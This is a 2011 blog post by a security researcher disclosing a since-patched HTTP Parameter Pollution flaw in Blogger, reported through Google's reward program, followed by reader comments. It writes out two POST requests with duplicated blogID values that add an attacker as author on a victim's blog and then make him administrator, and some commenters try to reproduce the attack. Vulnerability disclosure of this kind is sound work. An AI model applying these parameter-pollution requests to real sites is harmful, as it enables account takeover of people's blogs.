Thursday, March 10, 2011

How I Hacked Any Blogger Account


Hi,

This is my first post in my blog and also my first post regarding my security vulnerabilities findings in Google Reward Program,

In the last 2 months, I participated in Google reward program and found some High, Serious vulnerabilities,

(First, I want to mention that Google has the best professional, brilliant security team, It amazing how much Google care about security and do a amazing job to secure their sites, Thanks Adam, Google Security Team  for giving me the chance to show my skills :))

The vulnerability that I want to share first, Is a critical vulnerability in Blogger (Google Service),

That vulnerability could be used by an attacker to get administrator privilege over any blogger account (Permission Issue),

Yes I know it sound kind of crazy but it's true :),

Here are the details regarding the issue in Blogger service,

I found a HTTP Parameter Pollution vulnerability in Blogger that allow an attacker to add himself as an administrator on the victim's blogger account,

Technical details:

Here are the steps for getting admin control permissions over any blogger accounts.

1.

The attacker Use the invite author options in blogger (add authors):

Vulnerability location:

POST /add-authors.do HTTP/1.1
Request:

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite
As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&blogID=victimblogidvalue)


The server checks the first blogid value and executes the second blogid value of the attacker


2.

After that the attacker receives a mail to confirm him as a author (author invitation link),
After that, the attacker will be added as an author on the victim account.


3.

At this step it becomes possible to modify the attacker permission from an author to an administrator,
Vulnerability Location:
POST /team-member-modify.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges

And?





PoC Video:

2.(Full Video Download): http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html (The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.) Best Regards Nir.Goldshlager

16 comments:

hhhhhhhhhhhh said...

Is this patched? I tried it but can't get anything but a 404 when i tamper the authors-add request

[Ben Hayak] said...

Very impressive

keep up the good work !

Unknown said...

Thanks for reporting this issue to us privately. Blogger quickly fixed the problem a few months ago.

Unknown said...

Good work & gl with your new blog.
Anatoli

Unknown said...

great job again from Avnet pen team

Nir Goldshlager said...

(The vulnerability mentioned here has been confirmed patched (very fast) by the Google Security Team a few months ago.)

Raviv Raz said...

Truely one of the first live HPP proof of concept.
Way to go!

Pouya said...

Nice!
Good idea, Nil.

Unknown said...

good work, useful example how an attcker can exploit other application affected by this vulnerability

Cyberdin - Your Cyber Domain Inspector said...

Nice work...HPP is realy great technique.

But you still didn't managed to bypassed Comitari Web Protection Suite ;-)

Keep posting these interesting foundings...

Anonymous said...

I'm a newbie and trying to do as you did but not successfully :(

Anonymous said...

How can I make you part of my team?

Anonymous said...

Security is the name of my purpose in contacting you: Specially Social Networked profiles to keep forward on a project. I am an art entity (I call myself like that, to avoid political noise when defining "Artist" or worse: "female artist")some pages about in FaceBook Art in Hers, Galeria de Originales, Poesia -- twitter accounts are @imprimattura, @artistcoatl, @textualart other accounts include a number of blogs, parked websites, and unpublished materials: Kind of paralyzed because of security (I've already been attacked and want to protect futures). I wish you get interested in this: I want to innovate, make a cloud installation, publish a different kind of poetry book. Best wishes are to take pirates out and start making a profit.

posixninja said...

Epic work man!! I'm glad we're on the same team ;-)

cabana said...

ya really awsm!! Hat off you!!!

Unknown said...

Good information here. I will post these information to my facebook page. It is really very informative for others bangladeshrooms

Post a Comment